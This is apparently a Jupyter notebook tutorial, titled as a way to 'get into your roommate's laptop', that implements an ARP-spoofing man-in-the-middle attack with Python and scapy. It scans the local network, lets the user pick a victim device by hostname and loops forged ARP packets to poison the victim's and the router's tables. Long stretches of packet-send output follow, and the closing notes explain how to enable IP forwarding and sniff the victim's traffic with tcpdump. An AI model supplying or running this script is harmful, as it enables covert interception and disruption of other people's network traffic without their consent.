# MITM - Get into your Roomates Laptop
### Inform him beforehand😊 

 Import 
   - Socket for check our network interface and connetivity to internet
   - netifaces is used to extract MAC address for the Cicim IP address from the Dicionary of victims
   - Netaddr is used to import all generally used network commands for python packages

In [1]:
import socket   
import netifaces
from netaddr import *

<br>

- Now we'll get our private IP address to find the subnet in which we are.
- This is done because some Wi-Fi will use 192.168 or 172.16 or 10.0 for Guest networks

In [2]:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
myip = s.getsockname()[0]
s.close()

In [3]:
myip

'192.168.0.166'

- I used /24 as subnet here because /16 or /8 will take huge time to ARPing.
- Sometime in the process of scanning /16 networks, local Wi-Fi AP has a chance to block your IP for abnormal activities. 

In [4]:
subnet = '/24' # Find a way to get subnet mask
myipadd = str(IPNetwork(myip + subnet).network) + subnet

In [5]:
myipadd

'192.168.0.0/24'

<br>
<br>

- Now We'll ARPing the subnet with spoofed IP
- Broadcast is addressed to ff:ff:ff:ff:ff:ff
- I'm appending the findings in a list as dictionaries

In [6]:
%%time
client = []
from scapy.all import *
def scan1(ip):
    arp_packet = ARP(psrc='192.168.0.150', pdst=ip)
    broadcast_packet = Ether(dst = "ff:ff:ff:ff:ff:ff")
    arp_broadcast_packet = broadcast_packet/arp_packet
    answered_list = srp(arp_broadcast_packet, timeout = 1, verbose = False)[0]
    
    for sent,received in answered_list:
        client.append({'IP':received.psrc, 'MAC':received.hwsrc})

Wall time: 11.9 s


In [7]:
scan1(myipadd)

- Here, we're locally doing nslookup for all the IP address that replied to our ARPing. 
- This gives more power over choosing our victim 

In [8]:
%%time
for i in range (0,len(client)):
    try:
        client[i]['DNS'] = socket.gethostbyaddr(str(client[i]['IP']))[0]
    except:
        client[i]['DNS'] = 'Not Found'
        continue
print(client)

[{'IP': '192.168.0.1', 'MAC': 'b0:52:16:f8:34:dd', 'DNS': 'Not Found'}, {'IP': '192.168.0.131', 'MAC': '8c:85:90:5c:2d:94', 'DNS': 'vulkan'}, {'IP': '192.168.0.113', 'MAC': '20:79:18:2a:2f:e7', 'DNS': 'sid-pc'}, {'IP': '192.168.0.130', 'MAC': '24:18:1d:be:ff:9e', 'DNS': 'galaxy-s9'}, {'IP': '192.168.0.132', 'MAC': '30:24:32:93:a1:84', 'DNS': 'desktop-tjei1dr'}, {'IP': '192.168.0.142', 'MAC': 'a8:bb:cf:05:14:a2', 'DNS': 'rohits-mbp'}, {'IP': '192.168.0.143', 'MAC': '98:46:0a:0f:f0:3f', 'DNS': 'ipad'}, {'IP': '192.168.0.148', 'MAC': 'e4:f8:9c:82:bd:4c', 'DNS': 'lenovo-pc'}, {'IP': '192.168.0.146', 'MAC': '24:5a:b5:71:a2:b9', 'DNS': 'galaxy-a10e'}]
Wall time: 27.7 s


<br>
<br>
Select a victim from the pool of devices available

In [9]:
victimIP = input('Enter the Victim IP')

Enter the Victim IP192.168.0.113


In [10]:
gws=netifaces.gateways()
gatewayip = ((gws['default'])[2])[0]

In [11]:
gatewayip

'192.168.0.1'

- To carry out MITM, we need to spoof the MAC table of the victim and AP
- So, we're grabbing them from our list

In [12]:
for i in range (0,len(client)):
    if client[i]['IP'] == gatewayip:
        gatewayMAC = (client[i]['MAC'])
           
for i in range (0,len(client)):
    if client[i]['IP'] == victimIP:
        victimMAC = (client[i]['MAC'])

**Now, its time to attack!!!!**
<br>

- Lauch the attack in indefinite loop, which can be stopped only with keyboard interruption.
- This loop is to have longer access instead of sending few packets which will finish the attack in few seconds

In [13]:
while True:
    packet = ARP(op=1, pdst=victimIP, hwdst= victimMAC, psrc= gatewayip)
    send(packet) #Packet telling the Victim (with ip address 192.168.111.157) that the hacker is the Router.

    packet = ARP(op=1, pdst= gatewayip , hwdst=gatewayMAC, psrc= victimIP)
    send(packet) #Packet telling the Router (with ip address 192.168.111.2) that the hacker is the Victim.


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet

...


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet


Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 0 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packets.

Sent 1 packet

ERROR:root:Internal Python error in the inspect module.
Below is the traceback from this internal error.



Traceback (most recent call last):
  File "D:\Program Files\Anaconda3\lib\site-packages\IPython\core\interactiveshell.py", line 3326, in run_code
    exec(code_obj, self.user_global_ns, self.user_ns)
  File "<ipython-input-13-8d0bce7ce3fb>", line 6, in <module>
    send(packet) #Packet telling the Router (with ip address 192.168.111.2) that the hacker is the Victim.
  File "D:\Program Files\Anaconda3\lib\site-packages\scapy\sendrecv.py", line 319, in send
    realtime=realtime, return_packets=return_packets)
  File "D:\Program Files\Anaconda3\lib\site-packages\scapy\sendrecv.py", line 303, in __gen_send
    print("\nSent %i packets." % n)
  File "D:\Program Files\Anaconda3\lib\site-packages\ipykernel\iostream.py", line 402, in write
    self.pub_thread.schedule(lambda : self._buffer.write(string))
  File "D:\Program Files\Anaconda3\lib\site-packages\ipykernel\iostream.py", line 205, in schedule
    self._event_pipe.send(b'')
  File "D:\Program Files\Anaconda3\lib\site-packages\zmq\suga

KeyboardInterrupt: 

- Basically, the subprocess command you can see below is not related to this code.
- But it can be done for nslookups through CMD instead of python packages

*Just for Reference*

In [14]:
''' Running command in CMD - Not req. for this project

import subprocess

from subprocess import PIPE, Popen
def cmdline(command):
    process = Popen(
        args=command,
        stdout=PIPE,
        shell=True
    )
    return process.communicate()[0]

cmdline("nslookup 192.168.0.113")'''


b'Server:  UnKnown\r\nAddress:  192.168.0.1\r\n\r\nName:    sid-pc\r\nAddress:  192.168.0.113\r\n\r\n'

- This project basically interrupts the internet connectivity for the Victim
- Incase, to have access to their streaming data, run the program on linux with "ipforwarding" enabled
- Open a terminal and type "sudo tcpdump | grep *victimIP*" to get packets in human readable form